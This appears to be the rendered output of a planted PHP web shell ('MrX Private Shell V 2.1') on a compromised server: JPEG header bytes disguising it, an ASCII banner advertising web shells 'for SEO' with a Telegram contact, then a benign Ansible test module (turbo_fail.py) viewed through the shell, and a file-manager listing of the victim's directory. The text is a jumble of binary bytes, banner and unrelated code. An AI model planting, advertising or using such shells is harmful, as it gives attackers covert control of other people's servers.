����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# -*- coding: utf-8 -*-
# Copyright: (C) 2021, Aubin Bikouo <abikouo>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
DOCUMENTATION = r"""
---
module: turbo_fail
short_description: A short module which honor additional args when calling fail_json
version_added: "1.0.0"
description:
- "This module aims to test fail_json method on Ansible.turbo module"
options:
params:
description:
- parameter to display in task output
required: false
type: dict
author:
- Aubin Bikouo (@abikouo)
"""
EXAMPLES = r"""
- name: Fail without additional arguments
cloud.common.turbo_fail:
- name: Fail with additional arguments
cloud.common.turbo_fail:
params:
test: "ansible"
"""
import os
from ansible_collections.cloud.common.plugins.module_utils.turbo.module import (
AnsibleTurboModule as AnsibleModule,
)
def run_module():
module = AnsibleModule(
argument_spec=dict(
params=dict(type="dict"),
)
)
module.collection_name = "cloud.common"
msg = "ansible.cloud.fail"
if module.params.get("params"):
module.fail_json(msg=msg, **module.params.get("params"))
module.fail_json(msg=msg)
def main():
run_module()
if __name__ == "__main__":
main()
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| turbo_demo.py | File | 1.79 KB | 0644 |
|
| turbo_fail.py | File | 1.26 KB | 0644 |
|
| turbo_import.py | File | 978 B | 0644 |
|